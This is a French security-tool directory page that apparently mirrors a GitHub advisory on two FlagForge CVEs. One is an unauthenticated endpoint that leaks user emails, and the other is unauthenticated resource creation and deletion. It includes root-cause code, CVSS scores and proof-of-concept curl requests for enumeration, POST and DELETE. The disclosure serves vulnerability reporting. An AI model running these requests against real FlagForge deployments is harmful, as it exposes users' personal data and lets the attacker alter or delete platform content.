Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-59843-CVE-2025-59932 — CVE concernant FlagForge sur les versions 2.0.0 à 2.3.0. Mettez à jour vers la version 2.3.1 pour corriger le problème. | Kitploit
Outils/GitHubGitHub/at0mxploit/cve-2025-59843-cve-2025-59932
Analyse des VulnérabilitésCollecte d'InformationsSécurité WebTests d'IntrusionMauvaise ConfigurationSécurité des API
GitHubat0mxploit/cve-2025-59843-cve-2025-59932

CVE-2025-59843-CVE-2025-59932

CVE concernant FlagForge sur les versions 2.0.0 à 2.3.0. Mettez à jour vers la version 2.3.1 pour corriger le problème.

Voir le dépôt
13il y a 11 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-59843 & CVE-2025-59932

1. Exposition publique des adresses e-mail des utilisateurs CVE-2025-59843

Dans le périmètre / Application concernée : FlagForge Web Application

Point d'accès API : /api/user/[username]

Détails : Le point d'accès renvoie les adresses e-mail des utilisateurs sans authentification. N'importe quel nom d'utilisateur peut être interrogé publiquement.

Cause racine / Référence du code :

root@kitploit:~
const user = await UserSchema.findOne({
  name: { $regex: new RegExp(`^${username}$`, 'i') }
}).select('name email image totalScore customBadges createdAt role');

// No authentication check is performed
email: user.email, // Exposed publicly

Gravité (CVSS v4.0) : 5.5 (Moyenne)

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:P/CR:M/IR:L/AR:L/MAV:N/MAC:L/MAT:N/MPR:N/MUI:N/MVC:L/MVI:N/MVA:N/MSC:L/MSI:N/MSA:N/AU:Y/RE:L

Impact : Les attaquants peuvent énumérer les utilisateurs et accéder aux adresses e-mail, ce qui entraîne d'éventuelles violations de la vie privée.

Preuve de concept (PoC) :

root@kitploit:~
curl "https://staging.flagforge.xyz/api/user/No%20Reply"
Sample Response:

{
  "success": true,
  "user": {
    "name": "No Reply",
    "email": "<REDACTED>",
    ...
  }
}

2. Modification/Suppression potentielle de ressources non authentifiée CVE-2025-59932

Dans le périmètre / Application concernée : FlagForge Web Application

Point d'accès API : /api/resources

Détails :

GET /api/resources expose toutes les ressources publiquement.

D'après la revue de code, les requêtes POST et DELETE n'imposent pas d'authentification ni d'autorisation. Ces requêtes n'ont pas été testées sur le système en production pour éviter d'impacter les données.

En-têtes observés (requête OPTIONS) :

root@kitploit:~
❯ curl -i -X OPTIONS "https://staging.flagforge.xyz/api/resources"
HTTP/2 204
access-control-allow-origin: https://staging.flagforge.xyz
allow: DELETE, GET, HEAD, OPTIONS, POST
cache-control: no-store, no-cache, must-revalidate, proxy-revalidate
date: Thu, 25 Sep 2025 15:03:45 GMT
permissions-policy: geolocation=(), microphone=(), camera=(), payment=()
pragma: no-cache
referrer-policy: no-referrer
server: Vercel
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: rsc, next-router-state-tree, next-router-prefetch, next-router-segment-prefetch
x-content-type-options: nosniff
x-frame-options: DENY
x-matched-path: /api/resources
x-vercel-cache: MISS
x-vercel-id: bom1::iad1::v7k72-1758812623945-4e3fad4b58b4
x-xss-protection: 1; mode=block

Gravité (CVSS v4.0, si POST/DELETE ne sont pas authentifiés) : 7.8 (Élevée)

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:L/SI:H/SA:L/E:U/CR:M/IR:H/AR:M/MAV:N/MAC:L/MAT:N/MPR:N/MUI:N/MVC:L/MVI:H/MVA:L/MSC:L/MSI:H/MSA:L/S:N/AU:Y/RE:M/U:Red

Impact : Si POST ou DELETE ne sont pas authentifiés, un attaquant pourrait potentiellement créer ou supprimer des ressources, affectant l'intégrité de la plateforme.

Preuve de concept (PoC) :

root@kitploit:~
curl -X GET "https://staging.flagforge.xyz/api/resources"

Cela vous donnera le _id des ressources.

root@kitploit:~
curl -X POST "https://staging.flagforge.xyz/api/resources" \
-H "Content-Type: application/json" \
-d '{"title":"Test","description":"Test","category":"Web","resourceLink":"https://example.com","uploadedBy":"tester"}'
root@kitploit:~
curl -X DELETE "https://staging.flagforge.xyz/api/resources?id=<resource-id>"

Télécharger l’outil